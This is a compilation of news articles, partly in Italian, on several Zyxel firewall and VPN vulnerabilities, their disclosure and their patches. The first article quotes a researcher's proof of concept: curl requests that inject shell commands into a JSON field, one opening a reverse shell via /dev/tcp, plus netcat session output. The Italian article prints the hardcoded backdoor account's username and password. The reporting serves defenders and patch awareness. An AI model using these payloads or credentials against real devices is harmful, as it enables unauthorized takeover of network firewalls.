Zyxel silently patches command injection vulnerability with 9.8 severity rating

Zyxel silently patches command injection vulnerability with 9.8 severity rating

Hardware manufacturer Zyxel quietly released an update fixing a critical vulnerability that gives hackers the ability to control tens of thousands of firewall devices remotely.

The vulnerability, which allows remote command injection with no authentication required, carries a severity rating of 9.8 out of a possible 10. It’s easy to exploit by sending simple HTTP or HTTPS requests to affected devices. The requests allow hackers to send commands or open a web shell interface that enables hackers to maintain privileged access over time.

High-value, easy to weaponize, requires no authentication

The vulnerability affects a line of firewalls that offer a feature known as zero-touch provisioning. Zyxel markets the devices for use in small branch and corporate headquarter deployments. The devices perform VPN connectivity, SSL inspection, web filtering, intrusion protection, and email security and provide up to 5Gbps throughput through the firewall. The Shodan device search service shows more than 16,000 affected devices are exposed to the Internet.

The specific devices affected are:

Affected Model Affected Firmware Version
USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 thru ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN ZLD5.10 thru ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800 ZLD5.10 thru ZLD5.21 Patch 1

The vulnerability is tracked as CVE-2022-30525. Rapid7, the security firm that discovered it and privately reported it to Zyxel, said that the VPN series of the devices also support ZTP, but they’re not vulnerable because they don’t include other required functionality. In an advisory published Thursday, Rapid7 researcher Jake Baines wrote:

The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user. This vulnerability is exploited through the /ztp/cgi-bin/handler URI and is the result of passing unsanitized attacker input into the os.system method in lib_wan_settings.py. The vulnerable functionality is invoked in association with the setWanPortSt command. An attacker can inject arbitrary commands into the mtu or the data parameter.

Below are examples of (1) curl that causes the firewall to execute a ping of to IP address, followed by (2) the powershell output the results, (3) the spawning of a reverse shell and (4) things a hacker can do with the reverse shell:

    1. curl -v --insecure -X POST -H "Content-Type: application/json" -d '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
      :"1","vlanid":"5","mtu":"; ping;","data":"hi"}'
    2. nobody 11040 0.0 0.2 21040 5152 ? S Apr10 0:00 \_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL
      nobody 16052 56.4 0.6 18104 11224 ? S 06:16 0:02 | \_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
      nobody 16055 0.0 0.0 3568 1492 ? S 06:16 0:00 | \_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping; 5 >/dev/null 2>&1
      nobody 16057 0.0 0.0 2152 564 ? S 06:16 0:00 | \_ ping
    3. curl -v --insecure -X POST -H "Content-Type: application/json" -d '
      {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged": "1","vlanid":"5","mtu":"; bash -c \"exec bash -i &>/dev/tcp/ <&1;\";","data":"hi"}'
    4. albinolobster@ubuntu:~$ nc -lvnp 1270
      Listening on 1270
      Connection received on 37882
      bash: cannot set terminal process group (11037): Inappropriate ioctl for device
      bash: no job control in this shell
      bash-5.1$ id
      uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
      bash-5.1$ uname -a
      uname -a
      Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux

Rapid7 has developed a module for the Metasploit exploit framework here that automates the exploitation process.

Baines said that Rapid7 notified Zyxel of the vulnerability on April 13 and that the two parties agreed to provide a coordinated disclosure, including the fix, on June 21. The researcher went on to say that unbeknownst to Rapid7, the hardware manufacturer released a firmware update on April 28 that quietly fixed the vulnerability. Zyxel only obtained the CVE number on Tuesday, after Rapid7 asked about the silent patch, and published an advisory on Thursday.

According to AttackerKB, a resource on security vulnerabilities, CVE-2022-30525 is of high value to threat actors because it’s easy to weaponize, requires no authentication, and can be exploited in the default setup of vulnerable devices. Rapid7 representatives weren’t available to answer basic questions about the accuracy of that assessment.

Administrators must manually apply the patch unless they have changed default settings to allow automatic updating. Early indications are that the patch hasn’t been widely deployed, as a Shodan query for just one of the vulnerable firewalls, the ATP200, showed that only about 25 percent of exposed devices were running the latest firmware.

Vulnerabilities affecting firewalls can be especially severe because they sit at the outer edge of networks where incoming and outgoing traffic flows. Many firewalls can also read data before it’s encrypted. Administrators who oversee networks that use these affected devices should prioritize investigating their exposure to this vulnerability and patch accordingly.


Zyxel patches critical vulnerability that can allow Firewall and VPN hijacks

Stylized blue illustration of binary code and semiconductors.

Hardware manufacturer Zyxel has issued patches for a highly critical security flaw that gives malicious hackers the ability to take control of a wide range of firewalls and VPN products the company sells to businesses.

The flaw is an authentication bypass vulnerability that stems from a lack of a proper access-control mechanism in the CGI (common gateway interface) of affected devices, the company said. Access control refers to a set of policies that rely on passwords and other forms of authentication to ensure resources or data are available only to authorized people. The vulnerability is tracked as CVE-2022-0342.

“The flaw could allow an attacker to bypass the authentication and obtain administrative access of the device,” Zyxel said in an advisory. The severity rating is 9.8 out of a possible 10.

The vulnerability is present in the following devices:

Affected series Affected firmware version Patch availability
USG/ZyWALL ZLD V4.20 through ZLD V4.70 ZLD V4.71
USG FLEX ZLD V4.50 through ZLD V5.20 ZLD V5.21 Patch 1
ATP ZLD V4.32 through ZLD V5.20 ZLD V5.21 Patch 1
VPN ZLD V4.30 through ZLD V5.20 ZLD V5.21
NSG V1.20 through V1.33 Patch 4
  • Hotfix V1.33p4_WK11* available now
  • Standard patch V1.33 Patch 5 in May 2022

The advisory comes after other hardware makers have recently reported their products have similar vulnerabilities that are actively being exploited in the wild. Sophos, for instance, said that an authentication bypass vulnerability allowing remote code execution was recently fixed in the Sophos Firewall v18.5 MR3 (18.5.3) and older. CVE-2022-1040 was already being used to target companies, primarily in Asia.

Trend Micro also warned that hackers were exploiting a vulnerability in its Trend Micro Apex Central that made it possible to upload and execute malicious files. The flaw is tracked as CVE-2022-26871.

Zyxel credited the discovery of CVE-2022-0342 to Alessandro Sgreccia from Tecnical Service SrL and Roberto Garcia H and Victor Garcia R from Innotec Security. There are no known reports of the vulnerabilities being actively exploited.


Hackers are exploiting a backdoor built into Zyxel devices. Are you patched?

Promotional image of computer router.

Hackers are attempting to exploit a recently discovered backdoor built into multiple Zyxel device models that hundreds of thousands of individuals and businesses use as VPNs, firewalls, and wireless access points.

The backdoor comes in the form of an undocumented user account with full administrative rights that’s hardcoded into the device firmware, a researcher from Netherlands-based security firm Eye Control recently reported. The account, which uses the username zyfwp, can be accessed over either SSH or through a Web interface.

A serious vulnerability

The researcher warned that the account put users at considerable risk, particularly if it were used to exploit other vulnerabilities such as Zerologon, a critical Windows flaw that allows attackers to instantly become all-powerful network administrators.

“As the zyfwp user has admin privileges, this is a serious vulnerability,” Eye Control researcher Niels Teusink wrote. “An attacker could completely compromise the confidentiality, integrity and availability of the device. Someone could for example change firewall settings to allow or block certain traffic. They could also intercept traffic or create VPN accounts to gain access to the network behind the device. Combined with a vulnerability like Zerologon this could be devastating to small and medium businesses.”

Andrew Morris, founder and CEO of security firm GreyNoise, said on Monday that his company’s sensors have detected automated attacks that are using the account credentials in an attempt to log in to vulnerable devices. In most or all of the login attempts, the attackers have simply added the credentials to existing lists of default username/password combinations used to hack into unsecured routers and other types of devices.

“By definition, anything we’re seeing has to be opportunistic,” Morris said, meaning the attackers are using the credentials against IP addresses in a pseudorandom manner in hopes of finding connected devices that are susceptible to takeover. GreyNoise deploys collection sensors in hundreds of data centers worldwide to monitor Internetwide scanning and exploitation attempts.

The login attempts GreyNoise is seeing are happening over SSH connections, but Eye Control researcher Teusink said the undocumented account can also be accessed using a Web interface. The researcher said that a recent scan showed that more than 100,000 Zyxel devices have exposed the Web interface to the Internet.

Teusink said the backdoor appears to have been introduced in firmware version 4.39, which was released a few weeks ago. A scan of Zyxel devices in the Netherlands showed that about 10 percent of them were running that vulnerable version. Zyxel has issued a security advisory noting the specific device models that are affected. They include:


  • ATP series running firmware ZLD V4.60
  • USG series running firmware ZLD V4.60 ZLD
  • USG FLEX series running firmware ZLD V4.60
  • VPN series running firmware ZLD V4.60

AP controllers

  • NXC2500 running firmware V6.00 through V6.10
  • NXC5500 running firmware V6.00 through V6.10

For firewall models, a fix is already available. AP controllers, meanwhile, are scheduled to receive a fix on Friday. Zyxel said it designed the backdoor to deliver automatic firmware updates to connected access points over FTP.

People who use one of these affected devices should be sure to install a security fix as soon as it becomes available. Even when devices are running a version predating 4.6, users should still install the update, since it fixes separate vulnerabilities found in earlier releases. Disabling remote administration is also a good idea unless there is a good reason for allowing it.


C’è una backdoor in migliaia di prodotti Zyxel

L’account “nascosto” consente di prendere il controllo del dispositivo utilizzando livelli di privilegio root. E le credenziali erano visibili nel firmware…

Il 2020 è stato un vero calvario per i produttori di firewall e VPN, presi di mira da gruppi di pirati informatici che hanno sfruttato le (troppe) vulnerabilità emerse nel corso dei 12 mesi.

L’ultimo colpo di coda dell’anno trascorso conferma la tendenza e coinvolge Zyxel, i cui prodotti sarebbero vulnerabili ad attacchi in remoto a causa di una backdoor “dimenticata” dagli sviluppatori.

La falla di sicurezza (CVE-2020-29583) è stata annunciata dalla stessa azienda attraverso un report pubblicato su Internet, contestualmente al rilascio di una patch che la corregge.

Zyxel backdoor

Come si legge nel report, si tratta in realtà di un account amministrativo utilizzato per installare gli aggiornamenti firmware dei dispositivi, che utilizza delle credenziali (username “zyfwp”; password “PrOw!aN_fXp”) memorizzate nel codice del software di gestione.

A rendere particolarmente pericoloso il bug, c’è il fatto che le credenziali che consentono l’accesso in remoto sono facilmente recuperabili. Come spiegano i ricercatori di EYE in un rapporto pubblicato lo scorso 23 dicembre, username e password erano inseriti (in chiaro) all’interno del codice del software.

Chiunque, di conseguenza, avrebbe potuto accedere ai dispositivi con privilegi di amministratore alle appliance vulnerabili. L’elenco completo dei modelli interessati è riassunto in questa tabella. Secondo i ricercatori di EYE, i dispositivi esposti su Internet e vulnerabili all’attacco sarebbero più di 100.000.

Zyxel backdoor

Ora si apre una fase delicatissima, in cui tutte le aziende e gli enti che utilizzano uno dei prodotti compresi nell’elenco dovranno correre quanto prima ai ripari per aggiornare il firmware e “tappare” la backdoor.

Considerato che siamo nel mezzo delle feste natalizie, però, viene difficile immaginare un momento peggiore per ritrovarsi a gestire una situazione che potrebbe trasformarsi in una vera e propria emergenza.

Come se non bastasse, poi, gli aggiornamenti per i controller AP Zyxel (NXC2500 e NXC5500) non sono ancora disponibili e verranno rilasciati solo il prossimo 8 gennaio.

Condividi l’articolo

Articoli correlati
Altro in questa categoria


Da Cisco a Huawei: corsa per aggiornare i sistemi VPN

Una nuova tecnica di attacco mette a rischio le chiavi IKE. Raffica di aggiornamenti per ripristinare la sicurezza dei sistemi. Un errore nel sistema di negoziazione dei collegamenti tramite VPN espone al rischio che un pirata informatico possa violare il sistema crittografico e avere accesso a tutte le informazioni trasmesse. Come spiegano in un corposo […]

L’articolo Da Cisco a Huawei: corsa per aggiornare i sistemi VPN proviene da Securityinfo.it.